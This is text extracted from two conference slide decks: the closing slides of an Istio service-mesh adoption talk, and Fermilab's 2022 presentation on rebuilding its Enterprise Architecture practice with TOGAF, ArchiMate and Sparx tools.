- Fast, Safe Releases - Complete Observability - End-to-end Encryption - Request-level Authorization - Failure Prediction, Reaction By tracking service dependencies, revealing organizational structure. By **decoupling the network** from your app code. By handling north-south and east-west traffic with the **same APIs**. By allowing developers to focus on building **features**, driving **business value**. By giving you total **visibility** into service interactions. By accelerating the **DevOps feedback loop**. By hardening your applications, **reducing the risk of outages**. How do your **developers** and **operators** keep things up and running with explosive growth in number of services? By thinking **services first**: investing in **automation**, **tools**, and **cultural change**. How can **Istio** transform your organization? Through telemetry, uniformity, and automation. Adopting Istio is a **journey**. Istio Adoption Checklist ✅ **Who** will adopt Istio? (Which product teams? Which services? Will there be phases of adoption across your org?) ✅ **What features** to adopt? What will come first? ✅ **How to configure Istio?** One cluster per control plane? Multicluster? VMs? ✅ **Where** will you keep your Istio YAML? How will you roll out policy? ✅ **Plan ahead for Istio's costs** - time (sidecar latency) and money (CPUs) ✅ **How** will you upgrade Istio? How many versions behind? **Best Practices** 1. Put an Istio control plane where your applications live. 2. Keep your Istio policies in a Git repo 3. Use `istioctl analyze` to detect bad config 4. Create a "default" VirtualService & DestinationRule for every service 5. Use Kubernetes namespaces for isolation More at: [istio.io/docs/ops/best-practices](https://istio.io/docs/ops/best-practices) What we didn't cover VM workloads Multicluster Service mesh vs. API gateway Secure ingress JWT authentication Egress traffic control New features - istiod, Mixer v2 Resources istio.io istiobyexample.dev bit.ly/istio-samples bit.ly/istio-sacon Thank you! Cyberconflict: A new era of war, sabotage, and fear 9:15am-10:10am Wednesday, March 27, 2019 Location: Ballroom Secondary topics: Security and Privacy Rate this session We're living in a new era of constant sabotage, misinformation, and fear, in which everyone is a target, and you're often the collateral damage in a growing conflict among states. From crippling infrastructure to sowing discord and doubt, cyber is now the weapon of choice for democracies, dictators, and terrorists. David Sanger explains how the rise of cyberweapons has transformed geopolitics like nothing since the invention of the atomic bomb. Moving from the White House Situation Room to the dens of Chinese, Russian, North Korean, and Iranian hackers to the boardrooms of Silicon Valley, David reveals a world coming face-to-face with the perils of technological revolution—a conflict that the United States helped start when it began using cyberweapons against Iranian nuclear plants and North Korean missile launches. But now we find ourselves in a conflict we're uncertain how to control, as our adversaries exploit vulnerabilities in our hyperconnected nation and we struggle to figure out how to deter these complex, short-of-war attacks. David Sanger The New York Times David E. Sanger is the national security correspondent for the New York Times as well as a national security and political contributor for CNN and a frequent guest on CBS This Morning, Face the Nation, and many PBS shows. 
Appendix Istio Service mesh tool Open Source Istio APIs Prometheus, Grafana, Jaeger Control plane runs on your cluster Anthos Service Mesh Service mesh tool Google Product Istio APIs Google Cloud Monitoring, Tracing Control plane managed outside your cluster Works on GCP, AWS, on-prem SRE dashboards, alerts built in Security insights + recommendations
{"Source-Url": "https://cdn.oreillystatic.com/en/assets/1/event/307/Service%20mesh%20from%20the%20ground%20up_%20How%20Istio%20can%20transform%20your%20organization%20Presentation.pdf", "len_cl100k_base": 5222, "olmocr-version": "0.1.53", "pdf-total-pages": 135, "total-fallback-pages": 0, "total-input-tokens": 141651, "total-output-tokens": 9920, "length": "2e12", "weborganizer": {"__label__adult": 0.0002846717834472656, "__label__art_design": 0.0004611015319824219, "__label__crime_law": 0.0006136894226074219, "__label__education_jobs": 0.0009260177612304688, "__label__entertainment": 0.00012695789337158203, "__label__fashion_beauty": 0.00012624263763427734, "__label__finance_business": 0.0008935928344726562, "__label__food_dining": 0.0002034902572631836, "__label__games": 0.0004351139068603515, "__label__hardware": 0.001407623291015625, "__label__health": 0.00025153160095214844, "__label__history": 0.0001885890960693359, "__label__home_hobbies": 8.600950241088867e-05, "__label__industrial": 0.00034427642822265625, "__label__literature": 0.0001786947250366211, "__label__politics": 0.0005822181701660156, "__label__religion": 0.00024437904357910156, "__label__science_tech": 0.042236328125, "__label__social_life": 0.0001838207244873047, "__label__software": 0.09820556640625, "__label__software_dev": 0.8515625, "__label__sports_fitness": 0.00015652179718017578, "__label__transportation": 0.0002968311309814453, "__label__travel": 0.00014293193817138672}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 20625, 0.01163]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 20625, 0.09851]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 20625, 0.78261]], "google_gemma-3-12b-it_contains_pii": [[0, 124, false], [124, 378, null], [378, 490, null], [490, 508, null], [508, 644, null], [644, 705, null], [705, 1027, null], [1027, 1161, null], [1161, 1278, null], [1278, 1375, null], [1375, 1393, null], [1393, 1547, null], [1547, 1547, null], [1547, 1687, null], [1687, 1797, null], [1797, 1836, null], [1836, 1854, null], [1854, 1893, null], [1893, 2169, null], [2169, 2363, null], [2363, 2439, null], [2439, 2653, null], [2653, 2880, null], [2880, 2923, null], [2923, 2930, null], [2930, 3061, null], [3061, 3266, null], [3266, 3507, null], [3507, 3522, null], [3522, 3789, null], [3789, 4364, null], [4364, 4433, null], [4433, 4523, null], [4523, 4717, null], [4717, 4988, null], [4988, 5410, null], [5410, 5578, null], [5578, 6293, null], [6293, 6612, null], [6612, 6612, null], [6612, 6628, null], [6628, 6933, null], [6933, 7249, null], [7249, 7374, null], [7374, 7780, null], [7780, 8089, null], [8089, 8427, null], [8427, 8427, null], [8427, 8427, null], [8427, 8791, null], [8791, 8791, null], [8791, 8791, null], [8791, 9073, null], [9073, 9073, null], [9073, 9090, null], [9090, 9090, null], [9090, 9090, null], [9090, 9090, null], [9090, 9090, null], [9090, 9090, null], [9090, 9095, null], [9095, 9106, null], [9106, 9120, null], [9120, 9243, null], [9243, 9660, null], [9660, 9665, null], [9665, 9674, null], [9674, 9740, null], [9740, 10249, null], [10249, 10474, null], [10474, 10491, null], [10491, 10782, null], [10782, 10919, null], [10919, 11134, null], [11134, 11154, null], [11154, 11577, null], [11577, 11923, null], [11923, 11934, null], [11934, 11941, null], [11941, 12191, null], [12191, 12304, null], [12304, 12514, null], [12514, 12950, null], [12950, 13131, null], [13131, 13360, 
null], [13360, 13608, null], [13608, 13845, null], [13845, 13884, null], [13884, 13941, null], [13941, 14004, null], [14004, 14089, null], [14089, 14089, null], [14089, 14222, null], [14222, 14222, null], [14222, 14222, null], [14222, 14222, null], [14222, 14245, null], [14245, 14394, null], [14394, 14454, null], [14454, 14478, null], [14478, 14697, null], [14697, 14697, null], [14697, 14715, null], [14715, 14715, null], [14715, 14862, null], [14862, 15359, null], [15359, 15370, null], [15370, 15644, null], [15644, 15810, null], [15810, 15833, null], [15833, 16018, null], [16018, 16214, null], [16214, 16236, null], [16236, 16430, null], [16430, 16438, null], [16438, 16569, null], [16569, 16616, null], [16616, 16792, null], [16792, 17248, null], [17248, 17365, null], [17365, 17462, null], [17462, 17509, null], [17509, 17556, null], [17556, 17589, null], [17589, 18079, null], [18079, 18498, null], [18498, 18664, null], [18664, 18724, null], [18724, 18743, null], [18743, 18754, null], [18754, 20269, null], [20269, 20278, null], [20278, 20278, null], [20278, 20278, null], [20278, 20625, null]], "google_gemma-3-12b-it_is_public_document": [[0, 124, true], [124, 378, null], [378, 490, null], [490, 508, null], [508, 644, null], [644, 705, null], [705, 1027, null], [1027, 1161, null], [1161, 1278, null], [1278, 1375, null], [1375, 1393, null], [1393, 1547, null], [1547, 1547, null], [1547, 1687, null], [1687, 1797, null], [1797, 1836, null], [1836, 1854, null], [1854, 1893, null], [1893, 2169, null], [2169, 2363, null], [2363, 2439, null], [2439, 2653, null], [2653, 2880, null], [2880, 2923, null], [2923, 2930, null], [2930, 3061, null], [3061, 3266, null], [3266, 3507, null], [3507, 3522, null], [3522, 3789, null], [3789, 4364, null], [4364, 4433, null], [4433, 4523, null], [4523, 4717, null], [4717, 4988, null], [4988, 5410, null], [5410, 5578, null], [5578, 6293, null], [6293, 6612, null], [6612, 6612, null], [6612, 6628, null], [6628, 6933, null], [6933, 7249, null], [7249, 7374, null], [7374, 7780, null], [7780, 8089, null], [8089, 8427, null], [8427, 8427, null], [8427, 8427, null], [8427, 8791, null], [8791, 8791, null], [8791, 8791, null], [8791, 9073, null], [9073, 9073, null], [9073, 9090, null], [9090, 9090, null], [9090, 9090, null], [9090, 9090, null], [9090, 9090, null], [9090, 9090, null], [9090, 9095, null], [9095, 9106, null], [9106, 9120, null], [9120, 9243, null], [9243, 9660, null], [9660, 9665, null], [9665, 9674, null], [9674, 9740, null], [9740, 10249, null], [10249, 10474, null], [10474, 10491, null], [10491, 10782, null], [10782, 10919, null], [10919, 11134, null], [11134, 11154, null], [11154, 11577, null], [11577, 11923, null], [11923, 11934, null], [11934, 11941, null], [11941, 12191, null], [12191, 12304, null], [12304, 12514, null], [12514, 12950, null], [12950, 13131, null], [13131, 13360, null], [13360, 13608, null], [13608, 13845, null], [13845, 13884, null], [13884, 13941, null], [13941, 14004, null], [14004, 14089, null], [14089, 14089, null], [14089, 14222, null], [14222, 14222, null], [14222, 14222, null], [14222, 14222, null], [14222, 14245, null], [14245, 14394, null], [14394, 14454, null], [14454, 14478, null], [14478, 14697, null], [14697, 14697, null], [14697, 14715, null], [14715, 14715, null], [14715, 14862, null], [14862, 15359, null], [15359, 15370, null], [15370, 15644, null], [15644, 15810, null], [15810, 15833, null], [15833, 16018, null], [16018, 16214, null], [16214, 16236, null], [16236, 16430, null], [16430, 16438, null], [16438, 16569, null], 
[16569, 16616, null], [16616, 16792, null], [16792, 17248, null], [17248, 17365, null], [17365, 17462, null], [17462, 17509, null], [17509, 17556, null], [17556, 17589, null], [17589, 18079, null], [18079, 18498, null], [18498, 18664, null], [18664, 18724, null], [18724, 18743, null], [18743, 18754, null], [18754, 20269, null], [20269, 20278, null], [20278, 20278, null], [20278, 20278, null], [20278, 20625, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, false], [5000, 20625, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 20625, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 20625, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 20625, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 20625, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 20625, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 20625, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 20625, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 20625, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 20625, null]], "pdf_page_numbers": [[0, 124, 1], [124, 378, 2], [378, 490, 3], [490, 508, 4], [508, 644, 5], [644, 705, 6], [705, 1027, 7], [1027, 1161, 8], [1161, 1278, 9], [1278, 1375, 10], [1375, 1393, 11], [1393, 1547, 12], [1547, 1547, 13], [1547, 1687, 14], [1687, 1797, 15], [1797, 1836, 16], [1836, 1854, 17], [1854, 1893, 18], [1893, 2169, 19], [2169, 2363, 20], [2363, 2439, 21], [2439, 2653, 22], [2653, 2880, 23], [2880, 2923, 24], [2923, 2930, 25], [2930, 3061, 26], [3061, 3266, 27], [3266, 3507, 28], [3507, 3522, 29], [3522, 3789, 30], [3789, 4364, 31], [4364, 4433, 32], [4433, 4523, 33], [4523, 4717, 34], [4717, 4988, 35], [4988, 5410, 36], [5410, 5578, 37], [5578, 6293, 38], [6293, 6612, 39], [6612, 6612, 40], [6612, 6628, 41], [6628, 6933, 42], [6933, 7249, 43], [7249, 7374, 44], [7374, 7780, 45], [7780, 8089, 46], [8089, 8427, 47], [8427, 8427, 48], [8427, 8427, 49], [8427, 8791, 50], [8791, 8791, 51], [8791, 8791, 52], [8791, 9073, 53], [9073, 9073, 54], [9073, 9090, 55], [9090, 9090, 56], [9090, 9090, 57], [9090, 9090, 58], [9090, 9090, 59], [9090, 9090, 60], [9090, 9095, 61], [9095, 9106, 62], [9106, 9120, 63], [9120, 9243, 64], [9243, 9660, 65], [9660, 9665, 66], [9665, 9674, 67], [9674, 9740, 68], [9740, 10249, 69], [10249, 10474, 70], [10474, 10491, 71], [10491, 10782, 72], [10782, 10919, 73], [10919, 11134, 74], [11134, 11154, 75], [11154, 11577, 76], [11577, 11923, 77], [11923, 11934, 78], [11934, 11941, 79], [11941, 12191, 80], [12191, 12304, 81], [12304, 12514, 82], [12514, 12950, 83], [12950, 13131, 84], [13131, 13360, 85], [13360, 13608, 86], [13608, 13845, 87], [13845, 13884, 88], [13884, 13941, 89], [13941, 14004, 90], [14004, 14089, 91], [14089, 14089, 92], [14089, 14222, 93], [14222, 14222, 94], [14222, 14222, 95], [14222, 14222, 96], [14222, 14245, 97], [14245, 14394, 98], [14394, 14454, 99], [14454, 14478, 100], [14478, 14697, 101], [14697, 14697, 102], [14697, 14715, 103], [14715, 14715, 104], [14715, 14862, 105], [14862, 15359, 106], [15359, 15370, 107], [15370, 15644, 108], [15644, 15810, 109], [15810, 15833, 110], [15833, 16018, 111], [16018, 16214, 112], [16214, 16236, 113], [16236, 16430, 114], [16430, 16438, 115], [16438, 16569, 116], [16569, 16616, 117], [16616, 16792, 118], 
[16792, 17248, 119], [17248, 17365, 120], [17365, 17462, 121], [17462, 17509, 122], [17509, 17556, 123], [17556, 17589, 124], [17589, 18079, 125], [18079, 18498, 126], [18498, 18664, 127], [18664, 18724, 128], [18724, 18743, 129], [18743, 18754, 130], [18754, 20269, 131], [20269, 20278, 132], [20278, 20278, 133], [20278, 20278, 134], [20278, 20625, 135]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 20625, 0.02238]]}
olmocr_science_pdfs
2024-12-09
2024-12-09
b5157e6413ed4eb882d9e9d848006d0a7a447e80
Realigning the Enterprise Architecture Practice to achieve lab missions
Rennie Scott - Tammy Whited presenting
NLIT Summit 2022
19 October 2022
FERMILAB-SLIDES-22-205-OCIO

Abstract

Today's DOE Labs face the ever-increasing requirement of managing and responding to the accelerating environments of complexity and disruptive change. Adapting to this challenge requires holistic analysis, system thinking, and meticulous attention to detail. Fermilab's Office of Enterprise Architecture was identified as the area of investment to respond to the growing challenge. This presentation will be a descriptive overview of Fermilab's initiative to re-examine and refresh its approach to Enterprise Architecture. It will cover the revised vision, scope, developments, challenges, and lessons learned. It will go into depth on developing solutions for new capabilities, tools, and practices that are the areas targeted for maturity and growth. We will provide the current milestones we've achieved and the trending results. Finally, the presentation will close with an overview of the future steps on our roadmap goal of maximizing value to our stakeholders.

The Core Computing Division (CCD) was a division of the Computing Sector responsible for delivering technology services to the Fermilab community that would be considered "classic" IT functions, e.g., email, virtual servers, and networking. As with other IT organizations, they also provide domain-specific technology solutions, e.g., HR, Finance, Facilities, etc. The demand for these domain-specific technologies is managed and prioritized by the Information System Portfolio Management Team (IS-PMT). This is a somewhat formalized but "Agile" method by which the domain areas request the new services they would like CCD to schedule for the upcoming fiscal years. The process worked well, but growing pressures on all areas of the lab and accelerating demands for digital transformation require refinement and maturation.

The Growing Challenges

An overview of the growing challenges to Computing value creation

While CCD delivers a lot of value to individual stakeholders, the domains, including computing, can be very siloed in their interpretation of priorities.

Communication Across Domain Silos

Experts can conceptualize things differently when communicating across domains (even in the same organization). Although illustrated in the humorous 1970s cartoon "The Tree Swing" metaphor, we often forget this when we get into the details of a solution…

Figure 2 ¹,²

¹ Image Source: The Cheeky Monkey Media Blog "User Stories are the Rosetta Stone to Becoming Tech-lingual" https://www.cheekymonkeymedia.ca/blog/user-stories-are-the-rosetta-stone-to-becoming-tech-lingual/

Aligning on Outcomes

Often expert stakeholders will give you solutions to implement instead of collaborating on the details of what they are trying to achieve. This typically doesn't provide optimal solutions for domain stakeholders or Computing.

Figure 3 ¹ (Rennie Scott, 2022) NLIT 2022 Conference, Fermilab

Managing Complexity

What can seem like a straightforward project can get more and more complex as you start to find a solution and understand the data, systems, and microservices that the final solution must integrate.

We needed a broader landscape approach

Computing needs a way to focus on managing these stakeholder engagements to better understand and manage the technical, risk, and complexity aspects of these projects before they go to the technical experts.
• Let's focus on maturing and building out our Enterprise Architecture capability.
• Wrinkle! Our Enterprise Architect resigned.
• Opportunity! Three senior internal staff have approached with interest in filling the role.

The Choice

All three candidates bring different but equally valuable and needed aspects of the Enterprise Architect role. But they also need to continue the vital work they're involved in. Here is the proposal:
• Tammy will be the Enterprise Architect at a 50% FTE allocation
• Craig and Rennie will be Co-Deputy Enterprise Architects at a 25% allocation each.

Roadmap
• Year 1 – Acclimate to the role and develop the EA maturity plan project.
• Year 2 – Budget allocation to implement the new EA Practice Project and tools, using new projects for refinement
• Year 3 – If the experiment work is positive and there is actual value creation, we may reallocate all three as 100% FTE to the Enterprise Architect roles

An overview of progress in Year 1

Year 1 - Overview
• Roadmap Targets:
  – Acclimate to the role, identify areas of focus
  – Develop a Year 2 plan for developing the practice

Year 1: Identified areas for maturity
- **Demand Management** - Tammy, designated as the Demand Manager, worked with the Deputy CIO on engaging with the business stakeholders to roadmap future projects through the IS-PMT workflow.
- **Risk Management** - Rennie was assigned to sit on the Enterprise Risk Management Board as the Computing Risk Manager.
- **Requirements Engineering** - Craig was assigned to develop and continue maturing the requirements engagement framework.
- **Modeling & Design** - Rennie was designated the EA Repository Manager and began modeling critical areas of the Demand process and Service Management.

Year 1: Identified areas for maturity (continued)
• Managing Architecture Governance and Architectural Change
  – Tammy leads the development of the EA governance framework
  • Re-established the bi-weekly Community Collaboration Meeting for computing staff presentations of cross-enterprise technical initiatives.
  • She established the Technical Risk Assessment sub-group in collaboration with cybersecurity.
  • We have implemented the phase-one technical procurement approval workflow.
• Application Portfolio Management & SQA Program
  – Rennie was assigned as Application Portfolio Manager
  – Expand the Lab capabilities model for a capabilities-based planning model to rationalize and align application lifecycles.
• Mature the Solution Architect Role
  – Craig continues maturing and defining the Solution Architect role, and developing repeatable project engagements and deliverables.

Model the IS-PMT Process Architecture

An overview of progress in Year 2

Year 2 – Plan To Build the EA Practice

Received funding to renovate the practice:
• Contracted Enterprise Architecture consultants to advise us on best practices:
  – Select EA Frameworks
  – Get focused on EA training
  – Develop EA Processes
• Modeling and the EA repository
• Evaluated and selected EA Tools

An overview of our selected EA Frameworks
- TOGAF®
- Fermilab Enterprise Architecture Framework

All the architects were TOGAF® 9.2 trained and began working on IS-PMT projects using the Architectural Development Method (ADM) and the Business, Data, Application, Technology (BDAT) architecture approach.

The TOGAF® standard is a methodology and framework for planning, designing, implementing, and governing enterprise information technology architectures.
It was developed and is managed by The Open Group, and additional information can be found on its site: [https://www.opengroup.org](https://www.opengroup.org)

Fermilab Enterprise Architecture Framework (FLEAF)
- Working with the consultants, we developed the FLEAF architecture:
- A customized framework utilizing:
  - TOGAF®
  - IT4IT®
  - BPMN®
  - Archimate®
  - FEAF
  - ITIL®
  - IT-CMF
  - NIST Cybersecurity Framework
  - APQC Process Classification Framework
- The entire framework specification is 66 pages; several highlighted overviews follow in the next slides.

FLEAF Services Context

(Diagram: Vision, Mission, Goals, Operating Model, Business Strategy, and IT Strategy inform Portfolio Planning; AS-IS, Intermediate, and TO-BE enterprise architectures each cover Business, Information, Application, and Technology Architecture; supporting elements include the EA Repository, Enterprise Roadmap, Standards and Governance, Architecture Review Board, Reference Architectures, Reusable Assets, and Transformation Projects.)

The FLEAF Metamodel
Author: Daniel Lambert - Copyright 2022 – All Rights Reserved

Overview of our Enterprise Architecture Tools

Year 1 - Architecture Tools
• We started with open-source tools:
  – Archi – for small architecture models
  – Camunda Modeler – for BPMN models
  – StarUML – for small contained UML models
  – Continued to use Visio for stakeholder engagements

By Year 2, we needed to grow our capabilities to a platform that would offer the following:
- Act as our centralized TOGAF repository
- Native format version control
- Model collaboration tools
- Integration options to resource legacy artifacts and documentation
- Granular user and group access controls
- Easy and controllable user access to models for review, approval, and comment
- Integrate with our CMDB, project portfolio, and Service Management system: ServiceNow
- Be able to scale and provide future capabilities without much technical overhead

We selected the Sparx Systems suite for our toolset:
- **Sparx Enterprise Architect** – for modeling and requirements management
- **Sparx Pro-Cloud Server** – repository service and integration with ServiceNow for live information integration and service processes
- **Sparx Prolaborate** – customizable web service interface for stakeholder, management, and technical SME access to models and artifacts for comment, reference, and informational uses

The Repository Architecture

(Diagram: "20100 - Sparx EA Application Architecture", the future-state architecture for the Sparx Enterprise Architecture products. Architects and modelers use the Sparx Enterprise Architect desktop clients; business users, developers, and architects reach models through a web browser served by Sparx Prolaborate; the Sparx Pro Cloud Server exposes the EA application service over HTTPS and a REST API; application databases hold the EA repository and the Prolaborate database; supporting services include Active Directory, SAML, SMTP, and ServiceNow, on top of Windows Server, IIS, ASP.NET, ODBC/OLE DB, and MySQL Server.)

Year 2 - Modeling

Our modeling framework and approach

"Telling stories with visuals is an ancient art. We've been drawing pictures on cave walls for centuries. It's like what they say about the perfect picture book. The art and the text stand alone, but together, they create something even better." – Deborah Wiles.
Architecture Principle: EA will develop communication, perspectives, and architectural governance models whenever feasible.
- Previously, we leveraged models and diagrams to communicate complex ideas and solutions across business, scientific, technical, and management domains.
- Comprehending complex topics can take many iterations of discussions and reinterpretations across organizations. Visual representations using well-delineated models facilitate rapid understanding and correct false assumptions and specific areas of stakeholder concerns.
- Holistic visual models used in conjunction with requirements or user stories and data models help developers to focus on the end user's goals and increase inherent modularity for future expansion and solution maintainability. This reduces technical debt and increases change delivery.
- This is not inherently a matter of how intelligent people are; it is biologically the way human cognition functions. "Our brains process visual content at an incredibly high speed. In fact, by one estimate, visuals communicate information 60,000 times faster than text."¹

¹ Erin McCoy, 2019, How Our Brains Are Hardwired For Visual Content: https://killervisualstrategies.com/blog/how-our-brains-are-hardwired-for-visual-content.html

Chosen Modeling Languages & Model Framework
- ArchiMate - the Architectural Landscape Container Framework
- BPMN – Business Process and Workflow modeling
- UML & Visio - Application and Technology modeling

ArchiMate® is an enterprise architecture visual modeling language for use in modeling the strategy, business processes, information flow, infrastructure, and systems of an organization. It is excellent for abstracting high-level architectural landscapes to empower stakeholders to assess the consequences and impacts of decisions and changes. The ArchiMate® 3.1 language and specification was developed and is managed by The Open Group; additional information can be found on its site: https://www.opengroup.org

# ArchiMate Structure and Behavior Elements

The ArchiMate® language is much too rich to cover in this presentation, but a summary of the elements is included below from the specification. Several models will also be presented through the rest of the presentation as examples.
<table>
<thead>
<tr><th>Element</th><th>Definition</th></tr>
</thead>
<tbody>
<tr><td><strong>Active Structure</strong></td><td></td></tr>
<tr><td>Internal active structure element</td><td>Represents an entity that is capable of performing behavior.</td></tr>
<tr><td>Collaboration</td><td>Represents an aggregate of two or more internal active structure elements, working together to perform some collective behavior.</td></tr>
<tr><td>Interface (external active structure element)</td><td>Represents a point of access where one or more services are exposed to the environment.</td></tr>
</tbody>
</table>

## Behavior

<table>
<thead>
<tr><th>Element</th><th>Definition</th></tr>
</thead>
<tbody>
<tr><td>Internal behavior element</td><td>Represents a unit of activity that can be performed by one or more active structure elements.</td></tr>
<tr><td>Process</td><td>Represents a sequence of behaviors that achieves a specific result.</td></tr>
<tr><td>Function</td><td>Represents a collection of behavior based on specific criteria, such as required resources, competencies, or location.</td></tr>
<tr><td>Interaction</td><td>Represents a unit of collective behavior that must be performed by two or more active structure elements, either assigned directly or aggregated in a collaboration.</td></tr>
<tr><td>Service (external behavior element)</td><td>Represents an explicitly defined exposed behavior.</td></tr>
<tr><td>Event</td><td>Represents a state change.</td></tr>
</tbody>
</table>

## Passive Structure

<table>
<thead>
<tr><th>Element</th><th>Definition</th></tr>
</thead>
<tbody>
<tr><td>Passive structure element</td><td>Represents an element on which behavior is performed.</td></tr>
</tbody>
</table>

## Structural Relationships

<table>
<thead>
<tr><th>Structural Relationships</th><th>Role Names</th></tr>
</thead>
<tbody>
<tr><td>Composition</td><td>composed of / composed in</td></tr>
<tr><td>Aggregation</td><td>aggregates / aggregated in</td></tr>
<tr><td>Assignment</td><td>assigned to / has assigned</td></tr>
<tr><td>Realization</td><td>realizes / realized by</td></tr>
</tbody>
</table>

## Dependency Relationships

<table>
<thead>
<tr><th>Dependency Relationships</th><th>Role Names</th></tr>
</thead>
<tbody>
<tr><td>Serving</td><td>serves / served by</td></tr>
<tr><td>Access</td><td>accesses / accessed by</td></tr>
<tr><td>Influence</td><td>influences / influenced by</td></tr>
<tr><td>Association</td><td>associated with / associated from</td></tr>
</tbody>
</table>

## Dynamic Relationships

<table>
<thead>
<tr><th>Dynamic Relationships</th><th>Role Names</th></tr>
</thead>
<tbody>
<tr><td>Triggering</td><td>triggers / triggered by</td></tr>
<tr><td>Flow</td><td>flows to / flows from</td></tr>
</tbody>
</table>

## Other Relationships
<table> <thead> <tr> <th>Relationship Connectors</th> <th>Notation</th> <th>Role Names</th> </tr> </thead> <tbody> <tr> <td>Specialization</td> <td>← specializes</td> <td>← specialized by</td> </tr> </tbody> </table> ## Relationship Connectors <table> <thead> <tr> <th>Relationship Connectors</th> <th>Notation</th> <th>Role Names</th> </tr> </thead> <tbody> <tr> <td>Junction</td> <td></td> <td></td> </tr> </tbody> </table> Fermilab Model Example MongoDB(Service) As-Is MongoDB Service Service Realization Viewpoint Rev 1.0 Mar 15, 2021 Rennie Scott Legend - Application Component - Application Service - Business Actor - Business Service - Device - Junction - Node - Technology Service Deeper Business Modeling Details: BPMN • To drill deeper into the ArchiMate® business process elements, we’ve adopted the Object Management Group® (OMG) Business Process Modeling and Notation Standard (BPMN™). • BPMN™ is an open standard notation visual modeling language for business analysis, applications, and enterprise process workflows. • We’ve recently acquired Bpanda an application that will allow business organizations and stakeholders to enter in-text steps that will generate first-pass BPMN diagrams that can then be imported into the repository. Finally, to drill deeper into Application and Technical ArchiMate® elements, we’ve adopted the Object Management Group® (OMG) Unified Modeling Language (UML) An open modeling language used for constructing and documenting software, complex systems, and artifacts. We model UML in Sparx Enterprise Architect, import UML XML specification files, or hyperlink them in the repository. We can also import or link to Visio artifacts. Fermilab Model Example UML - Use Case Model for a Host Management Sub-System Model::Hosts - Business Use Case - Submit a change to the existing host list - Add a new Affiliation Host - Remove an Affiliation Host - Change a Hosts Priority - Approve changes to the Affiliation Hosts List - Receive notifications of Changes to the hosts list Participants: - Submitter - Division Head - Affiliation Rep - Users Office - Visa Office - FVA Office Manager Having just completed Year 2 an overview of our Year 3 Plans Year 3 - Plans • All three of the enterprise architects are now at 100% FTE • Having implemented many foundational pillars in Year 2, we are currently focused on connecting them across the landscape. • Develop and operationalize our EA services with standardized and repeatable deliverables. • Implement connected workflows and automation for governance. • Develop a one-stop portal for EA service requests, repository models, KPI, and digital portfolio access. • Roadmap planning to continue the march towards establishing Enterprise Architecture as a Fermilab Center of Excellence. Value Creation of the Initiative - Common communication tool - A standard method for modernization initiatives - Controlled project artifacts - Foundation for SQA and Risk Management lab processes - Better stakeholder identification - Outcomes better understood by all Conclusion Thank you for allowing us to share our journey thus far with you. 
If you would like to discuss anything covered in this presentation or would like further details, please reach out to one of the Fermilab Enterprise Architecture Team: - Tammy Whited twhited@fnal.gov - Craig Mohler cmohler@fnal.gov - Rennie Scott rennie@fnal.gov Extra Materials Additional model examples Fermilab Model Example Service Catalog Management (Business Architecture) Fermilab Model Example Centralized Repository Management To-Be (draft) Fermilab Model Example Centralized Repository Management To-Be (draft) Potential Customers - Experiments - Affiliations - Scientific Computing Division - Office of the CIO - Core Computing Division Current Customers - Customer: PIP II - Customer: SQMS Open Questions: - Who's accountable/responsible for the individual repository access & permission? - License Management and funding at scale? - Customer facing Git Repo SME Business Service? - Overlapping service capabilities consolidation and reduction opportunities? Legend: - application service - business actor - business interface - business service - grouping - product - technology service Complete Fermilab Service Management Model Strategic Viewpoint
{"Source-Url": "https://lss.fnal.gov/archive/2022/slides/fermilab-slides-22-205-ocio.pdf", "len_cl100k_base": 4642, "olmocr-version": "0.1.53", "pdf-total-pages": 47, "total-fallback-pages": 0, "total-input-tokens": 61982, "total-output-tokens": 5987, "length": "2e12", "weborganizer": {"__label__adult": 0.0005717277526855469, "__label__art_design": 0.004848480224609375, "__label__crime_law": 0.0006451606750488281, "__label__education_jobs": 0.012847900390625, "__label__entertainment": 0.0002675056457519531, "__label__fashion_beauty": 0.0003731250762939453, "__label__finance_business": 0.02008056640625, "__label__food_dining": 0.0005397796630859375, "__label__games": 0.0007586479187011719, "__label__hardware": 0.002918243408203125, "__label__health": 0.0008702278137207031, "__label__history": 0.0007872581481933594, "__label__home_hobbies": 0.0002560615539550781, "__label__industrial": 0.0041046142578125, "__label__literature": 0.0004336833953857422, "__label__politics": 0.0006427764892578125, "__label__religion": 0.0007085800170898438, "__label__science_tech": 0.29833984375, "__label__social_life": 0.00021159648895263672, "__label__software": 0.045135498046875, "__label__software_dev": 0.60302734375, "__label__sports_fitness": 0.00034737586975097656, "__label__transportation": 0.0009388923645019532, "__label__travel": 0.00037932395935058594}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 20483, 0.00993]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 20483, 0.09983]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 20483, 0.87717]], "google_gemma-3-12b-it_contains_pii": [[0, 174, false], [174, 1164, null], [1164, 1984, null], [1984, 2074, null], [2074, 2228, null], [2228, 2907, null], [2907, 3220, null], [3220, 3440, null], [3440, 4504, null], [4504, 5211, null], [5211, 5245, null], [5245, 5388, null], [5388, 6028, null], [6028, 6918, null], [6918, 6956, null], [6956, 6990, null], [6990, 7303, null], [7303, 7400, null], [7400, 7915, null], [7915, 8330, null], [8330, 8853, null], [8853, 8936, null], 